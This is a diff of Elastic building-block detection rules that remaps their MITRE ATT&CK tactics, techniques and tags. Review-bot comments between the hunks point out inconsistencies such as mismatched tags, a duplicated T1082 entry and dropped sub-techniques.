b/rules_building_block/defense_evasion_service_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] 
@@ -48,23 +48,26 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules_building_block/defense_evasion_service_path_registry.toml b/rules_building_block/defense_evasion_service_path_registry.toml index f2d9b61fb4e..9eb28e15955 100644 --- a/rules_building_block/defense_evasion_service_path_registry.toml +++ b/rules_building_block/defense_evasion_service_path_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
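Review bot: Dropping T1562.001 "Disable or Modify Tools" from a rule that fires on a service being disabled through the registry narrows its Defense Evasion coverage to the generic T1112, while the new TA0040 entry reclassifies the same event as T1489 "Service Stop"; disabling a service in the registry and stopping a running service are different behaviors, so confirm the rule's query matches the Impact framing. If both views are wanted, keeping the `T1562.001` sub-technique under the existing TA0005 entry alongside the new Impact entry preserves the previous coverage for dashboards that key on it.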
@@ -20,7 +20,16 @@ name = "Service Path Modification" risk_score = 21 rule_id = "f243fe39-83a4-46f3-a3b6-707557a102df" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -42,36 +51,48 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + 
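Review bot: The `tags` hunk replaces `"Tactic: Persistence"` and `"Tactic: Privilege Escalation"` with `"Tactic: Defense Evasion"`, but the threat hunk in the same file keeps the TA0003 Persistence and TA0004 Privilege Escalation entries (T1543.003) and only adds a TA0005 entry, so tags and `rule.threat` now disagree. Either restore the two tags, `"Tactic: Persistence",` and `"Tactic: Privilege Escalation",` after `"Tactic: Defense Evasion",`, or remove the two `[[rule.threat]]` entries if the tactic change is intended. The sc.exe service-path rule in the next two hunks has exactly the same mismatch.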
diff --git a/rules_building_block/defense_evasion_services_exe_path.toml b/rules_building_block/defense_evasion_services_exe_path.toml index f8c032bc23e..5a13a3271d6 100644 --- a/rules_building_block/defense_evasion_services_exe_path.toml +++ b/rules_building_block/defense_evasion_services_exe_path.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -26,7 +26,17 @@ name = "Service Path Modification via sc.exe" risk_score = 21 rule_id = "c5677997-f75b-4cda-b830-a75920514096" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Sysmon", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" 
@@ -38,36 +48,48 @@ process where event.type == "start" and process.name : "sc.exe" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules_building_block/defense_evasion_unsigned_bits_client.toml b/rules_building_block/defense_evasion_unsigned_bits_client.toml index 7d83ae84a7f..84012c3b2d4 100644 --- a/rules_building_block/defense_evasion_unsigned_bits_client.toml +++ b/rules_building_block/defense_evasion_unsigned_bits_client.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] 
@@ -44,13 +44,24 @@ not process.code_signature.status : ("errorExpired", "errorCode_endpoint*") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/defense_evasion_write_dac_access.toml b/rules_building_block/defense_evasion_write_dac_access.toml index ad7ea692da9..ca738169f21 100644 --- a/rules_building_block/defense_evasion_write_dac_access.toml +++ b/rules_building_block/defense_evasion_write_dac_access.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/15" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -42,7 +42,16 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Rule Type: BBR", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring", + "Rule Type: BBR", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "query" 
@@ -54,26 +63,19 @@ host.os.type: "windows" and event.action : ("Directory Service Access" or "objec [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" +[[rule.threat.technique.subtechnique]] +id = "T1222.001" +name = "Windows File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/discovery_capnetraw_capability.toml b/rules_building_block/discovery_capnetraw_capability.toml index fc509abd200..66cd382d8ff 100644 --- a/rules_building_block/discovery_capnetraw_capability.toml +++ b/rules_building_block/discovery_capnetraw_capability.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/12/24" [rule] author = ["Elastic"] 
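Review bot: The new single mapping to T1222.001 "Windows File and Directory Permissions Modification" should be checked against what this rule actually observes: the hunk header shows the query keyed on `event.action : ("Directory Service Access" ...`, i.e. WriteDAC on Active Directory objects, whereas T1222.001 describes NTFS file and directory ACL changes. If AD object DACL modification is the intended reading, a sentence in the PR description explaining why T1222.001 replaces the previous T1098 mapping would help the next maintainer. The tags hunk above is consistent with the new TA0005 entry.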
@@ -49,7 +49,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "new_terms" @@ -67,23 +74,11 @@ id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1040" -name = "Network Sniffing" -reference = "https://attack.mitre.org/techniques/T1040/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_generic_account_groups.toml b/rules_building_block/discovery_generic_account_groups.toml index ce6ec481af5..eb8dadcd502 100644 --- a/rules_building_block/discovery_generic_account_groups.toml +++ b/rules_building_block/discovery_generic_account_groups.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] 
@@ -64,17 +64,10 @@ and not process.parent.name : "LTSVC.exe" and not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" @@ -85,11 +78,11 @@ id = "T1069.002" name = "Domain Groups" reference = "https://attack.mitre.org/techniques/T1069/002/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" @@ -100,12 +93,15 @@ id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" + [[rule.threat.technique]] id = "T1201" name = "Password Policy Discovery" reference = "https://attack.mitre.org/techniques/T1201/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml index a7bc9dae1fb..981adb13784 100644 --- a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml +++ b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/12" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/12/24" [rule] author = ["Elastic"] 
@@ -66,14 +66,15 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml index 68e6f743fc7..3df1dd8bd91 100644 --- a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml +++ b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -59,16 +59,16 @@ process.name == "kubectl" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" reference = "https://attack.mitre.org/techniques/T1613/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules_building_block/discovery_linux_modprobe_enumeration.toml b/rules_building_block/discovery_linux_modprobe_enumeration.toml index 1dec0fd05c4..eee45ca1da0 100644 --- a/rules_building_block/discovery_linux_modprobe_enumeration.toml 
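Review bot: In the kubectl workload-discovery hunk the two techniques are swapped so that T1613 now precedes T1069, breaking the ascending-id order every other `[[rule.threat.technique]]` list in this diff keeps (for example T1007, T1012, T1049 in the PowerShell discovery rule); if the repo's rule normalizer sorts techniques by id, this reorder will be undone on the next format pass. The content change in the kernel-module hunk (T1518 to T1082) is consistent with the Discovery tactic already mapped there.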
+++ b/rules_building_block/discovery_linux_modprobe_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/08" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -44,7 +44,13 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "low" -tags = ["Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Auditd Manager", "OS: Linux", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -67,37 +73,15 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_linux_sysctl_enumeration.toml b/rules_building_block/discovery_linux_sysctl_enumeration.toml index 81a0034b824..332fd65a447 100644 --- a/rules_building_block/discovery_linux_sysctl_enumeration.toml +++ b/rules_building_block/discovery_linux_sysctl_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/08" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] 
@@ -44,7 +44,13 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "low" -tags = ["Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Auditd Manager", "OS: Linux", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "new_terms" @@ -64,27 +70,15 @@ file.path : ("/etc/sysctl.conf" or "/etc/sysctl.d" or /etc/sysctl.d/*) and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules_building_block/discovery_linux_system_owner_user_discovery.toml b/rules_building_block/discovery_linux_system_owner_user_discovery.toml index f5ed9b7ff4e..fe5f446429f 100644 --- a/rules_building_block/discovery_linux_system_owner_user_discovery.toml +++ b/rules_building_block/discovery_linux_system_owner_user_discovery.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/07/10" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -50,15 +50,11 @@ id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" -[[rule.threat.technique.subtechnique]] -id = "T1069.001" -name = "Local Groups" -reference = "https://attack.mitre.org/techniques/T1069/001/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_net_share_discovery_winlog.toml b/rules_building_block/discovery_net_share_discovery_winlog.toml index 6face7dc939..4d83aa90687 100644 --- a/rules_building_block/discovery_net_share_discovery_winlog.toml +++ b/rules_building_block/discovery_net_share_discovery_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/14" integration = ["windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -20,7 +20,15 @@ name = "Potential Network Share Discovery" risk_score = 21 rule_id = "b2318c71-5959-469a-a3ce-3a0768e63b9c" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Discovery", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Rule Type: BBR", + "Data Source: Windows Security Event Logs", +] type = "eql" query = ''' 
@@ -36,13 +44,26 @@ sequence by user.name, source.port, source.ip with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1039" +name = "Data from Network Shared Drive" +reference = "https://attack.mitre.org/techniques/T1039/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules_building_block/discovery_net_view.toml b/rules_building_block/discovery_net_view.toml index abbd287678c..196586ddc82 100644 --- a/rules_building_block/discovery_net_view.toml +++ b/rules_building_block/discovery_net_view.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -56,7 +56,17 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" 
@@ -81,7 +91,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" @@ -92,7 +101,21 @@ id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1039" +name = "Data from Network Shared Drive" +reference = "https://attack.mitre.org/techniques/T1039/" + + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules_building_block/discovery_of_domain_groups.toml b/rules_building_block/discovery_of_domain_groups.toml index 491bfd23563..c64491dcc33 100644 --- a/rules_building_block/discovery_of_domain_groups.toml +++ b/rules_building_block/discovery_of_domain_groups.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/17" [rule] author = ["Elastic"] @@ -44,18 +44,14 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/discovery_posh_generic.toml b/rules_building_block/discovery_posh_generic.toml index ca32bc8cca0..d25af55f2b8 100644 --- a/rules_building_block/discovery_posh_generic.toml 
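Review bot: Removing the `T1069.002` (Domain Groups) sub-technique from discovery_of_domain_groups.toml leaves only the parent `T1069`, which is less precise than the rule's own name and filename suggest, and the query (`process where host.os.type == "linux" ...`) is not touched in this hunk. Unless the intent is to generalise the rule, keep the `[[rule.threat.technique.subtechnique]]` block with `id = "T1069.002"` and `name = "Domain Groups"`. The first file in this diff drops `T1069.001` (Local Groups) the same way, and the same question applies there.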
+++ b/rules_building_block/discovery_posh_generic.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -25,7 +25,15 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: PowerShell Logs", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Discovery", + "Data Source: PowerShell Logs", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -193,7 +201,6 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1007" name = "System Service Discovery" @@ -204,11 +211,6 @@ id = "T1012" name = "Query Registry" reference = "https://attack.mitre.org/techniques/T1012/" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" 
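Review bot: The rewritten `tags` list in discovery_posh_generic.toml adds `"Tactic: Collection"`, but the `[[rule.threat]]` entry added to the same file further down (the `@@ -268,18 +270,37 @@` hunk) maps to `TA0002` Execution, and no Collection tactic appears anywhere in the rule's threat mapping. With the `_mitre_tactic_tag_gaps` helper introduced at the top of this series, that produces both an orphan tag (Collection) and a missing tag (Execution). The tag should be `"Tactic: Execution"` to match the mapping, as discovery_posh_password_policy.toml does in this same diff.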
@@ -220,25 +222,24 @@ name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" [[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" @@ -249,6 +250,7 @@ id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" + [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" 
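Review bot: On the new side this hunk leaves discovery_posh_generic.toml with two identical `[[rule.threat.technique]]` entries for `T1082` (System Information Discovery): the block that replaces the removed T1069 entry is immediately followed by the pre-existing T1082 context block. One of them should go; if the goal was only to drop T1069, the simplest fix is to delete the three added `id`/`name`/`reference` lines and the `[[rule.threat.technique]]` header above them and keep the existing block. Whether the repository's duplicate-technique check catches this depends on code outside this diff, so it is worth fixing regardless.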
@@ -268,18 +270,37 @@ reference = "https://attack.mitre.org/techniques/T1482/" id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" - [[rule.threat.technique.subtechnique]] id = "T1518.001" name = "Security Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/001/" + [[rule.threat.technique]] id = "T1615" name = "Group Policy Discovery" reference = "https://attack.mitre.org/techniques/T1615/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/discovery_posh_password_policy.toml b/rules_building_block/discovery_posh_password_policy.toml index 7b517268c32..fe12f739745 100644 --- 